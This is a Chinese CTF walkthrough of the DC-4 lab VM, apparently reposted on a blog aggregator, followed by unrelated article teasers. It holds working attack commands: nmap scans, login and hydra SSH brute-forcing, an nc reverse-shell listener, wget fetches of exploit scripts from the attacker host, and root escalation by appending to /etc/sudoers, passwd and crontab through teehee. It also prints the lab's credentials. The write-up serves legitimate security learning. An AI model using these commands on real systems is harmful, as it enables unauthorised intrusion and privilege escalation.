dc-4靶机渗透

news2024/11/25 15:47:03

1.信息搜集,扫描存活主机,扫描端口,服务,发现开放80,22端口,cms没有看到

nmap 192.168.85.0/24
nmap -p1-66535 192.168.85.175
nmap -sv 192.168.85.175

2.访问网站,发现登录框,根据提示,用户名可能是admin,随便找一个字典,进行爆粗
最后跑出密码为happy

在这里插入图片描述
在这里插入图片描述

3.发现命令执行,抓包,修改命令,刚开始想写shell,发现没有权限,下一个思路反弹shell,直接bash失败,使用python用不了,nc反弹成功,kali监听
在这里插入图片描述

在这里插入图片描述
kali

nc -lvnp 4444
python -c 'import pty; pty.spawn("/bin/bash")'    交互式shell

成功收到反弹的shell
在这里插入图片描述
4.需要进行提权
尝试suid提权

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
sudo进行发现www-data用户密码不知道,有一个test.sh,查看内容
在这里插入图片描述
尝试修改却发现这里的suid权限是jim用户的,赋予suid权限,是其他用户执行此文件时会以此文件的所有者执行,而不是suid权限就是以root执行
在这里插入图片描述
尝试内核提权,因为无法上传文件,但可以通过wget下载对应的漏扫和exp
kali开启apache服务或用python开http服务

python -m http.server 8000

dc-4下载:

wget http://192.168.85.129:8000/les.sh

在这里插入图片描述
内核提权失败
没发现数据库配置文件等
端口开放情况,命令执行不了
5.通过前面开放的22端口,可以尝试进行ssh爆破
通过信息搜集,在jim的家目录下找到密码配置文件
在这里插入图片描述
使用python或nc传文件
dc-4靶机

python -m SimpleHTTPServer 8000

kali

wget http://192.168.85.175:8000/old-passwords.bak

使用hydra进行ssh爆破
用户名三个
sam
jim
charles
密码使用bak文件

hydra -L user.txt -P old-passwords.bak ssh://192.168.85.175

爆破成功
用户名 jim
密码 jibril04
在这里插入图片描述
6.ssh登录
在这里插入图片描述
说有一封邮件,查看邮件
在这里插入图片描述
用户名charles
密码
发现charles的密码,切换用户到charles
进行信息搜集
在这里插入图片描述
发现第三方应用
7.teehee提权
在这里插入图片描述
这个地方就可以新添加一个root用户到passwd文件中或者直接修改sudo文件
或添加计划任务反弹shell或修改权限赋予suid

echo  'charles  ALL=(ALL:ALL) ALL'|sudo teehee -a /etc/sudoers
echo "fakeroot::0:0:::/bin/bash"|sudo teehee -a passwd
echo "* * * * * root chmod +s  /bin/sh" | sudo teehee -a /etc/crontab    #可能会失败,失败就赋予bash suid权限,bash -p提权

使用sudo修改root密码

sudo passwd root

得到flag
在这里插入图片描述
参考文章:
dc-4
dc-4

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/429548.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

360安全卫士 - 设置技巧 / 关闭广告

360安全卫士 - 设置技巧 / 关闭广告前言同步设置基本设置弹窗设置开机小助手安全防护中心漏洞修复木马查杀功能大全管理360文件夹游戏管家健康助手前言 360安全卫士是一款免费的PC安全软件,拥有垃圾清理、病毒查杀、启动项管理等功能。虽然有一些广告,但…

【Python】python技能树之包含元祖的列表升降序

文章目录前言一、实际操作二、使用步骤总结前言 大家都知道,在Python里面可以使用.sort方法或者sorted函数对各种数据进行排序,例如: 一、实际操作 a [2, 3, 1, 9, 3, 7, 4] a.sort() b [2, 3, 1, 9, 3, 7, 4] c sorted(b, reverseTrue…

Linux中的网络

文章目录一 、查看网络配置1.2 route命令—查看路由条目1.3 1.3hostname命令—查看主机名称1.4netstat命令—查看网络连接情况二 、测试网络连接2.1 ping 命令2.2 traceroute命令—跟踪数据包的路由途径2.3 mtr—动态跟踪网络2.4 nslookup命令—测试域名解析三 、使用网络配置命…

迎难而上,阿里高频考点2023Java岗面试突击手册

上周我接到一位粉丝的私信说目前互联网形势实在对他太不友好,感觉自己每个技术栈都会一点,但不是完全精通。基本二面三面的时候就挂了,已经完全不知道该朝哪个方向努力了,希望可以给他一些建议和方法指导。那么,本次就…

[golang gin框架] 20.Gin 商城项目-商品模块功能

一.商品模块数据表ER图关系分析商品模块数据表相关功能关系见:[golang gin框架] 16.Gin 商城项目-商品模块数据表ER图关系分析二.商品相关界面展示商品列表该商品列表有如下功能1.增加商品按钮:跳转到增加商品页面2.搜索功能:输入商品名称,点击搜索3.修改商品字段(上架,精品,新…

软件测试入门第一步:编写测试报告

什么是测试报告? 1、说明:是指把测试的过程和结果写成文档,对发现的问题和缺陷进行分析,为纠正软件的存在的质量问题提供依据,同时为软件验收和交付打下基础。 ps. 【测试过程和测试结果的分析报告,以及上线…

大爽pygame入门教程 第一节 基础知识 练习提示与答案

作者自我介绍:大爽歌, b站小UP主 ,编程1对1辅导老师 1 逐行展示 思路提示 点击触发 之前的多行展示,是通过循环实现的。 这一回要点击触发一行的展示,不能直接使用循环了。 这里我们往更深层次去思考一下: 之前循环…

【CSS】margin 外边距负值使用案例 ( 正常外边距 | 使用外边距负值实现边框重叠 | 重叠边框突出显示 )

文章目录一、正常外边距案例二、使用外边距负值实现边框重叠三、重叠边框突出显示案例1、使用相对定位2、使用 z-index 设置定位盒子层级一、正常外边距案例 margine 正常情况下使用 , 设置 float 浮动 , 使得相邻的盒子模型紧贴在一起 ; 如果设置边框 , 则相邻的边框会重叠在…

A Comprehensive Capability Analysis of GPT-3 and GPT-3.5 Series Models论文学习

一、概述 Motivation:GPT系列的模型,像GPT-3,CodeX,InstructGPT,ChatGPT,尽管很多人关注他们能力的不同,但是很少关注GPT系列模型随着时间变化其能力的变化情况。 Methods: 在9个NL…

【LeetCode】轮转数组

👻内容专栏:《LeetCode刷题专栏》 🐨本文概括:189.轮转数组 🐼本文作者:花 碟 🐸发布时间:2023.4.12 目录 思想1 暴力求解 代码实现: 思想2 三次倒置 代码实现&#…

Linux使用宝塔面板搭建网站,并内网穿透实现公网访问

文章目录前言1. 环境安装2. 安装cpolar内网穿透3. 内网穿透4.固定http地址5. 配置二级子域名6.创建一个测试页面前言 宝塔面板作为简单好用的服务器运维管理面板,它支持Linux/Windows系统,我们可用它来一键配置LAMP/LNMP环境、网站、数据库、FTP等&…

Java阶段二Day02

Java阶段二Day02 文章目录Java阶段二Day02SpringMVC的部分主流程HTTP请求Request1:请求行2:消息头3:消息正文HTTP响应Response1:状态行2:响应头3:响应正文通过版本迭代仿写SpringBootV1BirdBootApplication…

云安全—etcd未授权漏洞cert证书遗失

0x00 前言 今儿来看看etcd未授权漏洞以及cert证书遗失问题 0x01 etcd简述 1.etcd是什么 etcd是采用go语言编写的一个分布式的key-value存储。 2.etcd作用 etcd主要用于解决集群管中的OS升级的分布式并发控制以及配置文件的存储与分发等问题。在kubernetes集群中&#xff…

《白帽子讲Web安全》世界观安全

1.Web安全简史1.1中国黑客简史对于现代计算机系统来说,在用户态的最高权限是root,也是黑客们最渴望能够获取的系统最高权限。不想拿到“root”的黑客,不是好黑客。在现实世界中,真正造成破坏的,往往并非那些挖掘并研究…

css右外边距失效问题解释以及解决办法

浏览器默认从左往右渲染元素&#xff0c;在没有超出父容器的宽度的前提下 如果子容器的宽度能够被容纳 设置margin-right是没有用的 解释 <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><title></title…

Linux环境搭建SVN服务器并实现公网访问 - cpolar端口映射

文章目录前言1. Ubuntu安装SVN服务2. 修改配置文件2.1 修改svnserve.conf文件2.2 修改passwd文件2.3 修改authz文件3. 启动svn服务4. 内网穿透4.1 安装cpolar内网穿透4.2 创建隧道映射本地端口5. 测试公网访问6. 配置固定公网TCP端口地址6.1 保留一个固定的公网TCP端口地址6.2 …

C/C++中文参考手册离线最新版

最近又用回C/C刷题&#xff0c;回想上一年还在用Java&#xff0c;C/C才是世界上最好的语言&#xff08;纯属调侃&#xff09;。哼哼&#xff0c;不许反驳。 想分享我正在使用的C/C中文参考手册离线最新版给大家&#xff0c;需要的朋友们可以自行下载&#xff08;free的哦&#…

Pytorch对预训练好的VGG16模型进行微调

目录 1.数据集准备、预训练模型准备 2.对VGG16模型进行微调 3.对数据集进行预处理 4.对模型进行训练并可视化训练过程 5.该测试案例的完整代码 对于一个复杂的卷积神经网络来说&#xff0c;通常网络的层数非常大&#xff0c;网络的深度非常深、网络的参数非常多&#xff0c…

中文翻译英语转换器-怎么把wps表格里的英文翻译成中文

对于那些需要频繁地进行中英互译的用户来说&#xff0c;字数限制是一个常见的问题。很多翻译软件经常会限制每次翻译的字数&#xff0c;导致用户翻译工作的效率和质量无法得到保证。如果您正在遭受这些限制&#xff0c;中英互译字数无限的软件将让您的翻译工作变得更加便捷和高…

反射之成员方法

Class类中用于获取成员方法的方法 Method[] getMethods(): 返回所有公共成员方法对象的数组&#xff0c;包括继承 Method[] getDeclaredMethods(): 返回所有成员方法对象的数组&#xff0c;不包括继承 Method getMethod(String name,Class ) …